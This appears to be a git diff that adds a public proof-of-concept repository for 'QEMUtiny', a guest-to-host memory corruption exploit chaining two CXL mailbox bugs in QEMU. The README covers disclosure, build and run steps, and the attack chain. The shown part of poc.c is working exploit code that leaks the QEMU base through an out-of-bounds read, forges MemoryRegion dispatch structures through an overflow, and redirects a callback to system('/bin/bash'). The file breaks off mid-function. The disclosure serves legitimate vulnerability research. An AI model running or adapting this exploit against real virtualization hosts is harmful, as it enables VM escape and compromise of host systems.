diff --git a/qemu/README.md b/qemu/README.md new file mode 100644 index 0000000..bb21d1b --- /dev/null +++ b/qemu/README.md @@ -0,0 +1,131 @@ +# QEMUtiny + +## Abstract + +QEMUtiny is a memory corruption vulnerability in QEMU's implementation of CXL Type-3 +device emulation, reported against QEMU master `007b29752e` and confirmed +working against `5e61afe` (May 11, 2026). + +QEMUtiny was discovered autonomously with [V12](https://v12.sh) by Aaron Esau of the +[V12 security team](https://x.com/v12sec). The PoC was prepared by [@xia0o0o0o](https://xia0.sh/). + +> Want to find issues like this in your own code? Try V12 at https://v12.sh. + +The PoC chains two CXL mailbox bugs in `hw/cxl/cxl-mailbox-utils.c`: an +out-of-bounds read in `GET_LOG`, followed by an out-of-bounds write in +`SET_FEATURE`. + +1. **OOB read:** `cmd_logs_get_log()` treats the CEL log offset as an array + index in the `memmove()` source expression even though the CXL mailbox + offset is in bytes. +2. **OOB write:** `cmd_features_set_feature()` accepts byte offsets into + several small feature write-attribute structures without checking that + `offset + bytes_to_copy` stays inside the selected structure. + +We reported the bugs upstream. The maintainers state that CXL support currently targets non-virtualization use cases, so we feel comfortable releasing the PoC publicly. + +The included `poc.c` is a working exploit that drives the emulated CXL mailbox from the guest through the device BAR. It depends on offsets for the specific QEMU build and host libc layout. +The exploit could be weaponized to work reliably across many QEMU versions by using the OOB read to scan memory. However, this is out of scope for this PoC. + +## "QEMUtiny"? + +QEMU + Mutiny. + +## Building + +``` +gcc -O2 -Wall -Wextra -o exp poc.c +``` + +The reproducer must be run as root inside the guest because it writes PCI config +space and mmaps the CXL device BAR through sysfs. 
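As an aside on the two bugs summarized in the Abstract, the sketch below illustrates the arithmetic behind them. It is a minimal illustration, not code from QEMU or `poc.c`: `struct cel_entry` and its 4-byte layout, and the helper names `stride_as_index`, `stride_as_bytes`, and `range_ok`, are all assumptions introduced here. The first two helpers show how the same offset moves a typed pointer further than a byte pointer; the third shows one overflow-safe way to express the `offset + bytes_to_copy` check that the `SET_FEATURE` paths are described as missing.

```c
#include <stddef.h>
#include <stdint.h>

/* Illustrative stand-in for one CEL entry. The two-field, 4-byte layout is
 * an assumption made for this sketch, not copied from the QEMU source. */
struct cel_entry {
    uint16_t opcode;
    uint16_t effect;
};

/* Distance in bytes when `offset` is applied to a typed pointer: the
 * compiler scales it by sizeof(struct cel_entry). `log` must hold at
 * least `offset` entries so the pointer arithmetic stays defined. */
ptrdiff_t stride_as_index(const struct cel_entry *log, size_t offset)
{
    return (const uint8_t *)(log + offset) - (const uint8_t *)log;
}

/* Distance in bytes when the same `offset` is applied to a byte pointer,
 * which is how a mailbox byte offset is meant to be used. */
ptrdiff_t stride_as_bytes(const struct cel_entry *log, size_t offset)
{
    return ((const uint8_t *)log + offset) - (const uint8_t *)log;
}

/* Overflow-safe check that [offset, offset + len) lies inside an object of
 * `size` bytes. Returns 1 when the copy would stay in bounds, else 0. */
int range_ok(size_t offset, size_t len, size_t size)
{
    return offset <= size && len <= size - offset;
}
```

With a 4-byte entry, `stride_as_index(log, 8)` advances 32 bytes while `stride_as_bytes(log, 8)` advances 8, so a range check done in bytes does not cover the memory actually read. A call such as `range_ok(0x2e, 0x792, 0x40)` returns 0 for a copy shaped like the PoC's rank sparing write; the 0x40-byte destination size is a made-up figure for illustration.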
+ +``` +sudo ./exp +``` + +One-line version: + +``` +git clone https://github.com/v12-security/pocs.git && cd pocs/qemu && gcc -O2 -Wall -Wextra -o exp poc.c && sudo ./exp +``` + +## Test Setup + +Run `./run_qemu_shell.sh` on the host, then run `/exp` inside the guest. + + +`poc.c` assumes the CXL Type-3 device appears in the guest at: + +``` +/sys/bus/pci/devices/0000:35:00.0 +``` + +and that BAR2 is exposed as: + +``` +/sys/bus/pci/devices/0000:35:00.0/resource2 +``` + +If your guest enumerates the device at a different BDF, update the two sysfs +paths in `main()`. + +## How It Works + +1. **Mailbox access.** The guest enables PCI memory decoding for the CXL device, + maps BAR2, and sends CXL mailbox commands by writing the mailbox payload, + command, and control registers directly. + +2. **CEL out-of-bounds read.** `cmd_logs_get_log()` checks the requested CEL + range as if `offset` were a byte offset, but then performs pointer arithmetic + on `cci->cel_log` as a `struct cel_log *`. `poc.c` uses + `GET_LOG_OOB_BASE_OFFSET` to land just past the CEL buffer and read adjacent + QEMU CXL state. + +3. **QEMU address discovery.** The out-of-bounds CEL read leaks a CXL mailbox + command handler pointer and the `CXLType3Dev` heap address. The handler + pointer gives the QEMU PIE base for this build. + +4. **Rank sparing overflow.** The demo sends `SET_FEATURE / RANK_SPARING` with + a non-zero feature offset and a large payload. The rank sparing case copies + into `ct3d->rank_sparing_wr_attrs + hdr->offset` without bounding the copy to + `sizeof(ct3d->rank_sparing_wr_attrs)`, so the payload continues into later + `CXLType3Dev` fields. + +5. **Fake memory dispatch state.** The overflowed payload plants enough fake + `FlatView`, dispatch, section, `MemoryRegion`, and `MemoryRegionOps` state + for the sanitize path to call a controlled `MemoryRegionOps.write` callback. + +6. **Callback trigger.** `MEDIA_OPERATIONS / SANITIZE` starts a background + operation. 
When the sanitize worker reaches `address_space_set()`, it walks + the corrupted dispatch state and invokes the forged write callback. The demo + first uses this to call `memmove()` and leak libc, then repoints the callback + to `system("/bin/bash")`. + +## Affected Code Paths + +The missing `SET_FEATURE` bounds check affects the PPR paths and the sparing +write-attribute paths: + +- `soft_ppr_wr_attrs` +- `hard_ppr_wr_attrs` +- `cacheline_sparing_wr_attrs` +- `row_sparing_wr_attrs` +- `bank_sparing_wr_attrs` +- `rank_sparing_wr_attrs` + +`patrol_scrub_wr_attrs` already has the intended style of bounds check. + +## Affected Versions + +The full QEMUtiny chain uses two bugs. + +- **OOB read:** the vulnerable `GET_LOG` path was introduced by + `056172691b` (`hw/cxl/device: Add log commands (8.2.9.4) + CEL`), first + released in QEMU `v7.1.0`. +- **OOB write:** the vulnerable PPR and memory sparing `SET_FEATURE` paths were + introduced by `5e5a86bab8` and `da5cafdc4d`, released in QEMU v11.0.0. + +## Credit + +Found with V12 by Aaron Esau of the V12 security team. diff --git a/qemu/bios-256k.bin b/qemu/bios-256k.bin new file mode 100644 index 0000000..509f398 Binary files /dev/null and b/qemu/bios-256k.bin differ diff --git a/qemu/efi-e1000.rom b/qemu/efi-e1000.rom new file mode 100644 index 0000000..6312b11 Binary files /dev/null and b/qemu/efi-e1000.rom differ diff --git a/qemu/efi-e1000e.rom b/qemu/efi-e1000e.rom new file mode 100644 index 0000000..1f9e0e9 Binary files /dev/null and b/qemu/efi-e1000e.rom differ diff --git a/qemu/images/alpine-latest-releases.yaml b/qemu/images/alpine-latest-releases.yaml new file mode 100644 index 0000000..ca5d528 --- /dev/null +++ b/qemu/images/alpine-latest-releases.yaml @@ -0,0 +1,104 @@ +--- +- + title: "Mini root filesystem" + desc: | + Minimal root filesystem. + For use in containers + and minimal chroots. 
+ branch: v3.23 + arch: x86_64 + version: 3.23.4 + flavor: alpine-minirootfs + file: alpine-minirootfs-3.23.4-x86_64.tar.gz + iso: alpine-minirootfs-3.23.4-x86_64.tar.gz + date: 2026-04-15 + time: 04:51:29 + size: 3715799 + sha256: 85498865362aa7ebececa0d725a2f2e4db7ac4e4b2850b8df21645afa0d03ee3 + sha512: b3ff0f964f014033bf23006d6fcb83d7c5d4842cac958c236f064a256658576b41f3a749d48f82791b5ce981c828302fbce01efc9cb7be97eebb53f6ad5cde64 +- + title: "Netboot" + desc: | + Kernel, initramfs and modloop for + netboot. + + branch: v3.23 + arch: x86_64 + version: 3.23.4 + flavor: alpine-netboot + file: alpine-netboot-3.23.4-x86_64.tar.gz + iso: alpine-netboot-3.23.4-x86_64.tar.gz + date: 2026-04-15 + time: 04:53:04 + size: 381806514 + sha256: 6929377b64d6bea9820e40b51ba98c1f72e5320206cdd4821cb11f5b1751c58a + sha512: e4dbc3c9afb4c29d353d1929ac5013b3819be512bdc18e60bd8cad83921211347ab053f840e1909f04da8f2ef0dd9614a0dd5321fcba1db6e0c16c623dbc63ec +- + title: "Standard" + desc: | + Alpine as it was intended. + Just enough to get you started. + Network connection is required. + branch: v3.23 + arch: x86_64 + version: 3.23.4 + flavor: alpine-standard + file: alpine-standard-3.23.4-x86_64.iso + iso: alpine-standard-3.23.4-x86_64.iso + date: 2026-04-15 + time: 04:54:19 + size: 363855872 + sha256: cfef39c7954f7c4447bcb321b9f4a1cef834536a321309d2c31275d9f2475a4e + sha512: 0ac2492cf4081d8443da14948bbd0627bfa05c05465fa8a6abb5f445dc549ad58b5c96838235a865bbfc3efc0ab811aa22aa6c6e5c3edc0529aa07975cfe11bc +- + title: "Extended" + desc: | + Most common used packages included. + Suitable for routers and servers. + Runs from RAM. + Includes AMD and Intel microcode updates. 
+ branch: v3.23 + arch: x86_64 + version: 3.23.4 + flavor: alpine-extended + file: alpine-extended-3.23.4-x86_64.iso + iso: alpine-extended-3.23.4-x86_64.iso + date: 2026-04-15 + time: 04:55:46 + size: 1416314880 + sha256: 5ab0ec479e3de6da78f3cb12bdd2395768b1038b0fe3d12d3f57f39a9139015d + sha512: bf636d5eac914b3954871909e3899eb73eead66b19db52f3ae16da7680b4e1d7f688ca23f3a077c122cd22e55953ea92d1464f4ab0f7bad43ddc4a593edaa4cf +- + title: "Virtual" + desc: | + Similar to standard. + Slimmed down kernel. + Optimized for virtual systems. + branch: v3.23 + arch: x86_64 + version: 3.23.4 + flavor: alpine-virt + file: alpine-virt-3.23.4-x86_64.iso + iso: alpine-virt-3.23.4-x86_64.iso + date: 2026-04-15 + time: 04:56:11 + size: 70254592 + sha256: f802033362595ad55de7bce00c500c51a756c94e229768afdcf7e68e49994c48 + sha512: 3cb57ce6bdd1abfa7fdb2015da21a0f416297579683eb16518db54870eba1f598f5a8577902e22caeb08468831766f6a6934d57ed490706f9014efbd8ff2971d +- + title: "Xen" + desc: | + Built-in support for Xen Hypervisor. + Includes packages targetted at Xen usage. + Use for Xen Dom0. 
+ branch: v3.23 + arch: x86_64 + version: 3.23.4 + flavor: alpine-xen + file: alpine-xen-3.23.4-x86_64.iso + iso: alpine-xen-3.23.4-x86_64.iso + date: 2026-04-15 + time: 04:57:36 + size: 1473511424 + sha256: 696d228c2b6477d326bcce599dd75c1e8615c6ee70717d89cf6d93d7fc323545 + sha512: 5416c6a6c3ff304f4d9c367425ae5246dee032ad354e1a026839a332f252c804dc4f9d099bdf4bc475a692865d43ab617f9b59c5544bdd23db28cc59597c5fd7 diff --git a/qemu/images/alpine-minirootfs-3.23.4-x86_64.tar.gz b/qemu/images/alpine-minirootfs-3.23.4-x86_64.tar.gz new file mode 100644 index 0000000..085210c Binary files /dev/null and b/qemu/images/alpine-minirootfs-3.23.4-x86_64.tar.gz differ diff --git a/qemu/images/alpine.gz b/qemu/images/alpine.gz new file mode 100644 index 0000000..77c2a81 Binary files /dev/null and b/qemu/images/alpine.gz differ diff --git a/qemu/images/vmlinuz-linux b/qemu/images/vmlinuz-linux new file mode 100755 index 0000000..1f82b73 Binary files /dev/null and b/qemu/images/vmlinuz-linux differ diff --git a/qemu/kvmvapic.bin b/qemu/kvmvapic.bin new file mode 100644 index 0000000..045f5c2 Binary files /dev/null and b/qemu/kvmvapic.bin differ diff --git a/qemu/linuxboot_dma.bin b/qemu/linuxboot_dma.bin new file mode 100644 index 0000000..d176f62 Binary files /dev/null and b/qemu/linuxboot_dma.bin differ diff --git a/qemu/poc.c b/qemu/poc.c new file mode 100644 index 0000000..5e74f78 --- /dev/null +++ b/qemu/poc.c @@ -0,0 +1,558 @@ +#define _GNU_SOURCE + +#include <errno.h> +#include <fcntl.h> +#include <inttypes.h> +#include <limits.h> +#include <stdint.h> +#include <stdio.h> +#include <stdlib.h> +#include <string.h> +#include <sys/mman.h> +#include <sys/types.h> +#include <unistd.h> + +#define PCI_COMMAND 0x04 +#define PCI_COMMAND_MEMORY 0x0002 +#define PCI_COMMAND_MASTER 0x0004 + +#define CXL_MAILBOX_REGS 0x88 +#define CXL_MBOX_CTRL (CXL_MAILBOX_REGS + 0x04) +#define CXL_MBOX_CMD (CXL_MAILBOX_REGS + 0x08) +#define CXL_MBOX_STS (CXL_MAILBOX_REGS + 0x10) +#define CXL_MBOX_PAYLOAD (CXL_MAILBOX_REGS + 0x20) +#define CXL_BAR2_MAP_SIZE 0x1000 + +#define CXL_MBOX_SUCCESS 0x00 + +#define LOGS 0x04 +#define 
GET_LOG 0x01 +#define FEATURES 0x05 +#define SET_FEATURE 0x02 +#define SANITIZE 0x44 +#define MEDIA_OPERATIONS 0x02 + +#define SET_FEATURE_HDR_LEN 0x20 +#define SET_FEATURE_INITIATE 0x01 +#define RANK_SPARING_SET_VERSION 0x01 + +#define MEDIA_OP_CLASS_SANITIZE 0x01 +#define MEDIA_OP_SAN_SUBC_SANITIZE 0x00 + +#define CXL_MBOX_BG_STARTED 0x01 + +#define GET_LOG_OOB_BASE_OFFSET 0x10000 + +#define FAKE_FLATVIEW_OFF 0x54e +#define FAKE_DISPATCH_OFF 0x58e +#define FAKE_SECTION_OFF 0x5ce +#define FAKE_MEMORY_REGION_OFF 0x62e +#define FAKE_OPS_OFF 0x74e +#define FAKE_BITMAP_OFF 0x7ae +#define FAKE_COMMAND_OFF 0x7b6 +#define RIP_SMASH_DATA_LEN 0x7c0 + +#define CXL_STATIC_VMEM_SIZE 0x10000000 +#define CXL_CACHELINE_SIZE 0x40 + +#define QEMU_PACKED __attribute__((packed)) + +static int enable_pci_memory_decode(const char *dev_path) +{ + char path[PATH_MAX + 32]; + int fd; + uint16_t cmd; + ssize_t n; + + snprintf(path, sizeof(path), "%s/config", dev_path); + fd = open(path, O_RDWR); + if (fd < 0) { + printf("[-] open(%s) failed: %s\n", path, strerror(errno)); + return -1; + } + + n = pread(fd, &cmd, sizeof(cmd), PCI_COMMAND); + if (n != (ssize_t)sizeof(cmd)) { + printf("[-] pread PCI_COMMAND failed: %s\n", + n < 0 ? strerror(errno) : "short read"); + close(fd); + return -1; + } + + cmd |= PCI_COMMAND_MEMORY | PCI_COMMAND_MASTER; + n = pwrite(fd, &cmd, sizeof(cmd), PCI_COMMAND); + if (n != (ssize_t)sizeof(cmd)) { + printf("[-] pwrite PCI_COMMAND failed: %s\n", + n < 0 ? 
strerror(errno) : "short write"); + close(fd); + return -1; + } + + close(fd); + return 0; +} + +static void mmio_write32(volatile uint8_t *mmio, size_t off, uint32_t value) { + *(volatile uint32_t *)(mmio + off) = value; +} + +static void mmio_write64(volatile uint8_t *mmio, size_t off, uint64_t value) { + *(volatile uint64_t *)(mmio + off) = value; +} + +static uint64_t mmio_read64(volatile uint8_t *mmio, size_t off) { + return *(volatile uint64_t *)(mmio + off); +} + +static void mmio_write_bytes(volatile uint8_t *mmio, size_t off, + const uint8_t *buf, size_t len) +{ + for (size_t i = 0; i < len; i++) { + *(volatile uint8_t *)(mmio + off + i) = buf[i]; + } +} + +static void mmio_read_bytes(volatile uint8_t *mmio, size_t off, + uint8_t *buf, size_t len) +{ + for (size_t i = 0; i < len; i++) { + buf[i] = *(volatile uint8_t *)(mmio + off + i); + } +} + +static int leak_oob_relative(volatile uint8_t *mmio, uint32_t rel, + void *dst, size_t len) +{ + uint8_t tmp[0x800]; + uint32_t aligned_rel = rel & ~3U; + uint32_t inner = rel & 3U; + uint32_t req_len = (uint32_t)len + inner; + struct { + uint8_t uuid[16]; + uint32_t offset; + uint32_t length; + } QEMU_PACKED get_log = { + .uuid = { + 0x0d, 0xa9, 0xc0, 0xb5, 0xbf, 0x41, 0x4b, 0x78, + 0x8f, 0x79, 0x96, 0xb1, 0x62, 0x3b, 0x3f, 0x17, + }, + .offset = GET_LOG_OOB_BASE_OFFSET + aligned_rel / 4, + .length = req_len, + }; + uint64_t cmd_reg; + uint64_t sts_reg; + uint32_t out_len; + uint16_t ret; + + mmio_write_bytes(mmio, CXL_MBOX_PAYLOAD, (const uint8_t *)&get_log, + sizeof(get_log)); + + cmd_reg = GET_LOG | (LOGS << 8) | ((uint64_t)sizeof(get_log) << 16); + mmio_write64(mmio, CXL_MBOX_CMD, cmd_reg); + mmio_write32(mmio, CXL_MBOX_CTRL, 1); + + sts_reg = mmio_read64(mmio, CXL_MBOX_STS); + cmd_reg = mmio_read64(mmio, CXL_MBOX_CMD); + ret = (uint16_t)((sts_reg >> 32) & 0xffff); + out_len = (uint32_t)((cmd_reg >> 16) & 0xfffff); + + if (ret != CXL_MBOX_SUCCESS) { + printf("[-] failed to get log\n"); + return 2; + } + + 
mmio_read_bytes(mmio, CXL_MBOX_PAYLOAD, tmp, out_len); + memcpy(dst, tmp + inner, len); + return 0; +} + +static int leak_qemu(volatile uint8_t *mmio, uint64_t *memmove_plt, + uint64_t *libc_start_main_got) +{ + uint8_t raw[8]; + uint64_t handler; + uint64_t qemu_base; + + leak_oob_relative(mmio, 0x80d0, raw, sizeof(raw)); + + handler = *(uint64_t *)raw; + printf("[+] LOGS_GET_LOG handler: 0x%016" PRIx64 "\n", handler); + + qemu_base = handler - 0x047E735; // cmd_logs_get_log + if (qemu_base & 0xfff) { + printf("[-] ??? 0x%016" PRIx64 "\n", qemu_base); + return 1; + } + + *memmove_plt = qemu_base + 0x0341BB0; + *libc_start_main_got = qemu_base + 0x01E72FF8; + + printf("[+] qemu: 0x%016" PRIx64 "\n", qemu_base); + printf("[+] memmove@plt: 0x%016" PRIx64 "\n", *memmove_plt); + printf("[+] __libc_start_main@got: 0x%016" PRIx64 "\n", *libc_start_main_got); + return 0; +} + +static void hexdump_raw(const uint8_t *data, size_t len, size_t disp_base) +{ + int eliding = 0; + for (size_t i = 0; i < len; i += 16) { + int all_zero = 1; + for (size_t j = 0; j < 16 && i + j < len; j++) + if (data[i + j]) { all_zero = 0; break; } + if (all_zero) { + if (!eliding) + printf(" \x1b[90m *\x1b[0m\n"); + eliding = 1; + continue; + } + eliding = 0; + printf("\x1b[90m %04zx \x1b[0m", disp_base + i); + for (size_t j = 0; j < 16; j++) { + if (j == 8) printf(" "); + if (i + j < len) + printf("%s%02x\x1b[0m ", data[i + j] ? 
"\x1b[97m" : "\x1b[90m", data[i + j]); + else + printf(" "); + } + printf(" \x1b[90m|\x1b[0m"); + for (size_t j = 0; j < 16 && i + j < len; j++) { + uint8_t c = data[i + j]; + if (c >= 0x20 && c < 0x7f) printf("%c", c); + else if (c == 0) printf("\x1b[90m.\x1b[0m"); + else printf("\x1b[91m*\x1b[0m"); + } + printf("\x1b[90m|\x1b[0m\n"); + } + if (eliding) + printf(" \x1b[90m *\x1b[0m\n"); +} + +static int trigger_media_operations_sanitize(volatile uint8_t *mmio, + uint64_t dpa_addr, + uint64_t length) +{ + struct { + uint8_t media_operation_class; + uint8_t media_operation_subclass; + uint8_t rsvd[2]; + uint32_t dpa_range_count; + struct { + uint64_t starting_dpa; + uint64_t length; + } QEMU_PACKED dpa_range_list[1]; + } QEMU_PACKED media_op_in_sanitize_pl = { + .media_operation_class = MEDIA_OP_CLASS_SANITIZE, + .media_operation_subclass = MEDIA_OP_SAN_SUBC_SANITIZE, + .dpa_range_count = 1, + .dpa_range_list = { + { + .starting_dpa = dpa_addr, + .length = length, + }, + }, + }; + uint64_t cmd_reg; + uint64_t sts_reg; + uint16_t ret; + + printf("\n\x1b[1;96m >> MEDIA_OPERATIONS / SANITIZE\x1b[0m\n"); + printf(" \x1b[90mclass\x1b[0m \x1b[93m0x%02x\x1b[0m \x1b[90msubclass\x1b[0m \x1b[93m0x%02x\x1b[0m\n", + MEDIA_OP_CLASS_SANITIZE, MEDIA_OP_SAN_SUBC_SANITIZE); + printf(" \x1b[90mdpa\x1b[0m \x1b[92m0x%016" PRIx64 "\x1b[0m\n", dpa_addr); + printf(" \x1b[90mlength\x1b[0m \x1b[92m0x%016" PRIx64 "\x1b[0m\n", length); + printf(" \x1b[90mpayload\x1b[0m %zu bytes\n", sizeof(media_op_in_sanitize_pl)); + + mmio_write_bytes(mmio, CXL_MBOX_PAYLOAD, (const uint8_t *)&media_op_in_sanitize_pl, sizeof(media_op_in_sanitize_pl)); + + cmd_reg = MEDIA_OPERATIONS | (SANITIZE << 8) | ((uint64_t)sizeof(media_op_in_sanitize_pl) << 16); + printf(" \x1b[90mcmd_reg\x1b[0m \x1b[95m0x%016" PRIx64 "\x1b[0m\n", cmd_reg); + mmio_write64(mmio, CXL_MBOX_CMD, cmd_reg); + mmio_write32(mmio, CXL_MBOX_CTRL, 1); + + sts_reg = mmio_read64(mmio, CXL_MBOX_STS); + ret = (uint16_t)((sts_reg >> 32) & 0xffff); + + 
if (ret != CXL_MBOX_BG_STARTED && ret != CXL_MBOX_SUCCESS) { + printf(" \x1b[1;91m<< FAILED\x1b[0m ret=\x1b[91m0x%04x\x1b[0m\n\n", ret); + return 2; + } + printf(" \x1b[1;92m<< OK\x1b[0m ret=\x1b[92m0x%04x\x1b[0m sts=\x1b[90m0x%016" PRIx64 "\x1b[0m\n\n", ret, sts_reg); + return 0; +} + +void trigger_set_feature_rank_raw(volatile uint8_t *mmio, + uint16_t feature_offset, + const uint8_t *data, + uint32_t data_len) +{ + struct { + uint8_t uuid[16]; + uint32_t flags; + uint16_t offset; + uint8_t version; + uint8_t rsvd[9]; + uint8_t data[0x800 - SET_FEATURE_HDR_LEN]; + } QEMU_PACKED set_feature = { + .uuid = { + 0x34, 0xdb, 0xaf, 0xf5, 0x05, 0x52, 0x42, 0x81, + 0x8f, 0x76, 0xda, 0x0b, 0x5e, 0x7a, 0x76, 0xa7, + }, + .flags = SET_FEATURE_INITIATE, + .offset = feature_offset, + .version = RANK_SPARING_SET_VERSION, + }; + uint64_t cmd_reg; + uint32_t in_len = SET_FEATURE_HDR_LEN + data_len; + + memcpy(set_feature.data, data, data_len); + + printf("\n\x1b[1;96m >> SET_FEATURE / RANK_SPARING\x1b[0m\n"); + printf(" \x1b[90muuid\x1b[0m \x1b[95m34dbaff5-0552-4281-8f76-da0b5e7a76a7\x1b[0m\n"); + printf(" \x1b[90moffset\x1b[0m \x1b[93m0x%04x\x1b[0m\n", feature_offset); + printf(" \x1b[90mversion\x1b[0m \x1b[93m0x%02x\x1b[0m\n", RANK_SPARING_SET_VERSION); + printf(" \x1b[90mflags\x1b[0m \x1b[93m0x%08x\x1b[0m (INITIATE)\n", SET_FEATURE_INITIATE); + printf(" \x1b[90mdata_len\x1b[0m \x1b[92m0x%x\x1b[0m\n", data_len); + printf(" \x1b[90min_len\x1b[0m \x1b[92m0x%x\x1b[0m (hdr 0x%x + data)\n", in_len, SET_FEATURE_HDR_LEN); + + printf(" \x1b[90mdata:\x1b[0m\n"); + hexdump_raw(data, data_len, feature_offset); + + mmio_write_bytes(mmio, CXL_MBOX_PAYLOAD, + (const uint8_t *)&set_feature, in_len); + + cmd_reg = SET_FEATURE | (FEATURES << 8) | ((uint64_t)in_len << 16); + printf(" \x1b[90mcmd_reg\x1b[0m \x1b[95m0x%016" PRIx64 "\x1b[0m\n", cmd_reg); + mmio_write64(mmio, CXL_MBOX_CMD, cmd_reg); + mmio_write32(mmio, CXL_MBOX_CTRL, 1); + printf(" \x1b[1;92m<< sent\x1b[0m\n\n"); + + return; +} + 
+static void hexdump_payload(const uint8_t *data, size_t len) +{ + static const struct { + size_t start; + size_t end; + const char *col; + const char *name; + } regions[] = { + { 0x000, 0x2e, "\x1b[90m", "zero-init" }, + { 0x2e, 0xee, "\x1b[37m", "mr-seeds" }, + { 0xee, FAKE_FLATVIEW_OFF, "\x1b[37m", "region0" }, + { FAKE_FLATVIEW_OFF, FAKE_DISPATCH_OFF, "\x1b[92m", "FlatView" }, + { FAKE_DISPATCH_OFF, FAKE_SECTION_OFF, "\x1b[96m", "Dispatch" }, + { FAKE_SECTION_OFF, FAKE_MEMORY_REGION_OFF, "\x1b[93m", "Section" }, + { FAKE_MEMORY_REGION_OFF, FAKE_OPS_OFF, "\x1b[95m", "MemRegion" }, + { FAKE_OPS_OFF, FAKE_BITMAP_OFF, "\x1b[94m", "Ops" }, + { FAKE_BITMAP_OFF, FAKE_COMMAND_OFF, "\x1b[91m", "Bitmap" }, + { FAKE_COMMAND_OFF, RIP_SMASH_DATA_LEN, "\x1b[97m", "Command" }, + }; + const int nregions = (int)(sizeof(regions) / sizeof(regions[0])); + int prev_region = -1; + int in_elision = 0; + + printf("\n\x1b[1m payload hexdump (%zu bytes)\x1b[0m\n ", len); + for (int r = 0; r < nregions; r++) + printf("%s%-11s\x1b[0m ", regions[r].col, regions[r].name); + printf("\n\n"); + + for (size_t i = 0; i < len; i += 16) { + int cur = 0; + for (int r = 0; r < nregions; r++) { + if (i >= regions[r].start && i < regions[r].end) { cur = r; break; } + } + if (cur != prev_region) { + if (in_elision) + printf(" \x1b[90m *\x1b[0m\n"); + in_elision = 0; + printf(" %s+-- %-11s @ +0x%03zx\x1b[0m\n", + regions[cur].col, regions[cur].name, regions[cur].start); + prev_region = cur; + } + + int all_zero = 1; + for (size_t j = 0; j < 16 && i + j < len; j++) + if (data[i + j]) { all_zero = 0; break; } + if (all_zero) { + if (!in_elision) + printf(" \x1b[90m *\x1b[0m\n"); + in_elision = 1; + continue; + } + in_elision = 0; + + printf("\x1b[90m %04zx \x1b[0m ", i); + + for (size_t j = 0; j < 16; j++) { + if (j == 8) printf(" "); + if (i + j >= len) { printf(" "); continue; } + uint8_t b = data[i + j]; + size_t pos = i + j; + const char *col = "\x1b[90m"; + for (int r = 0; r < nregions; r++) { + if 
(pos >= regions[r].start && pos < regions[r].end) { + col = b ? regions[r].col : "\x1b[90m"; + break; + } + } + printf("%s%02x\x1b[0m ", col, b); + } + + printf(" \x1b[90m|\x1b[0m"); + for (size_t j = 0; j < 16 && i + j < len; j++) { + uint8_t c = data[i + j]; + if (c >= 0x20 && c < 0x7f) printf("%c", c); + else if (c == 0) printf("\x1b[90m.\x1b[0m"); + else printf("\x1b[91m*\x1b[0m"); + } + printf("\x1b[90m|\x1b[0m\n"); + } + if (in_elision) + printf(" \x1b[90m *\x1b[0m\n"); + printf("\n"); +} + +static void forge_callback_payload(uint8_t *data, uint64_t rank_host, + uint64_t fn, uint64_t opaque, + uint64_t mr_addr, const char *arg) +{ + uint64_t fake_flatview = rank_host + FAKE_FLATVIEW_OFF; + uint64_t fake_dispatch = rank_host + FAKE_DISPATCH_OFF; + uint64_t fake_section = rank_host + FAKE_SECTION_OFF; + uint64_t fake_mr = rank_host + FAKE_MEMORY_REGION_OFF; + uint64_t fake_ops = rank_host + FAKE_OPS_OFF; + uint64_t fake_bitmap = rank_host + FAKE_BITMAP_OFF; + uint64_t fake_command = rank_host + FAKE_COMMAND_OFF; + uint8_t *region0 = data + 0xee; + const uint64_t section_size = CXL_CACHELINE_SIZE; + + memset(data, 0, RIP_SMASH_DATA_LEN); + + *(uint64_t *)(data + 0x2e) = fake_flatview; + *(uint64_t *)(data + 0xb6) = CXL_CACHELINE_SIZE; + data[0xea] = 1; + + *(uint64_t *)(region0 + 0) = CXL_STATIC_VMEM_SIZE; + *(uint64_t *)(region0 + 8) = CXL_CACHELINE_SIZE; + *(uint64_t *)(region0 + 16) = CXL_CACHELINE_SIZE; + *(uint64_t *)(region0 + 24) = CXL_CACHELINE_SIZE; + *(uint64_t *)(region0 + 40) = fake_bitmap; + region0[0x6c] = 1; + + *(uint32_t *)(data + FAKE_FLATVIEW_OFF + 16) = 1; + *(uint64_t *)(data + FAKE_FLATVIEW_OFF + 40) = fake_dispatch; + *(uint64_t *)(data + FAKE_FLATVIEW_OFF + 48) = fake_mr; + + *(uint64_t *)(data + FAKE_DISPATCH_OFF) = fake_section; + + *(uint64_t *)(data + FAKE_SECTION_OFF) = section_size; + *(uint64_t *)(data + FAKE_SECTION_OFF + 8) = 0; + *(uint64_t *)(data + FAKE_SECTION_OFF + 16) = fake_mr; + *(uint64_t *)(data + FAKE_SECTION_OFF + 24) 
= fake_flatview; + *(uint64_t *)(data + FAKE_SECTION_OFF + 32) = mr_addr; + *(uint64_t *)(data + FAKE_SECTION_OFF + 40) = CXL_STATIC_VMEM_SIZE; + + *(uint64_t *)(data + FAKE_MEMORY_REGION_OFF + 80) = fake_ops; + if (arg) { + snprintf((char *)data + FAKE_COMMAND_OFF, + RIP_SMASH_DATA_LEN - FAKE_COMMAND_OFF, "%s", arg); + opaque = fake_command; + } + *(uint64_t *)(data + FAKE_MEMORY_REGION_OFF + 88) = opaque; + *(uint64_t *)(data + FAKE_MEMORY_REGION_OFF + 112) = section_size; + data[FAKE_MEMORY_REGION_OFF + 152] = 1; + data[FAKE_MEMORY_REGION_OFF + 154] = 1; + + *(uint64_t *)(data + FAKE_OPS_OFF + 8) = fn; + *(uint32_t *)(data + FAKE_OPS_OFF + 40) = 1; + *(uint32_t *)(data + FAKE_OPS_OFF + 44) = 1; + data[FAKE_OPS_OFF + 48] = 1; + *(uint32_t *)(data + FAKE_OPS_OFF + 64) = 1; + *(uint32_t *)(data + FAKE_OPS_OFF + 68) = 1; + data[FAKE_OPS_OFF + 72] = 1; + *(uint64_t *)(data + FAKE_BITMAP_OFF) = UINT64_MAX; + + hexdump_payload(data, RIP_SMASH_DATA_LEN); +} + +void fake_write_call(volatile uint8_t *mmio, uint64_t rank_host, + uint64_t fn, uint64_t opaque, uint64_t mr_addr, + const char *arg) +{ + uint8_t data[RIP_SMASH_DATA_LEN]; + printf("[*] MemoryRegionOps.write=0x%016" PRIx64 " opaque=0x%016" PRIx64 " mr_addr=0x%016" PRIx64 "\n", fn, opaque, mr_addr); + + forge_callback_payload(data, rank_host, fn, opaque, mr_addr, arg); + trigger_set_feature_rank_raw(mmio, 0x2e, data + 0x2e, sizeof(data) - 0x2e); + trigger_media_operations_sanitize(mmio, CXL_STATIC_VMEM_SIZE, CXL_CACHELINE_SIZE); + + printf("[*] waiting."); + for (int i = 0; i < 8; i++) { + sleep(1); printf("."); + } + 